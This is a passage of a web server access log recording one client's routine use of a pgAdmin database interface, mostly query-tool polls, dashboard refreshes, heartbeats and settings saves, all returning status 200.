(KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:48 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:48 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:39:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:40:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:41:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:42:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:42:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:43:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:43:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:44:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:12 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:12 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:12 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:16 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:16 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:17 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:17 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:18 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:19 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 589] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:19 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:22 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:23 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/download/3857941" [Client 84.1.26.27] [Length 305] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:24 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:26 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:28 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:47:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:47:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 